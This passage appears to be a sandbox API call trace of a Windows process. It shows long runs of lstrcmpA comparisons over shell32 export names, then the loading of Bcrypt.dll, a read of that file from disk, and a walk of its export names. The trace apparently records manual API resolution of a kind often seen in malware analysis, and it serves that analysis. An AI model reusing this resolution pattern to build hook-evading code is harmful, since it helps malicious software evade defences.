(lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.533] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.534] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0248.535] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0248.536] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0248.537] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0248.537] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0248.537] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0248.537] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0248.537] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.537] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0248.537] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0248.538] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0248.539] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0248.539] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0248.539] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0248.539] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0248.539] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0248.539] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0248.871] GetProcessHeap () returned 0x430000 [0248.871] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x405d040 | out: hHeap=0x430000) returned 1 [0252.025] GetProcessHeap () returned 0x430000 [0252.025] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449900 [0252.025] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0252.032] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.032] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.032] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0252.033] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0252.033] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.033] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.033] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0252.033] GetProcessHeap () returned 0x430000 [0252.033] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x26fa0) returned 0x2c92010 [0252.035] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.035] ReadFile (in: hFile=0x15c, lpBuffer=0x2c92010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c92010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0252.039] CloseHandle (hObject=0x15c) returned 1 [0252.039] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0252.039] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0252.039] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0252.039] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0252.039] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.039] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0252.040] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0252.040] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0252.040] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0252.040] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0252.040] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.040] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0252.041] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0252.041] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0252.041] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0252.042] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0252.042] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0252.042] 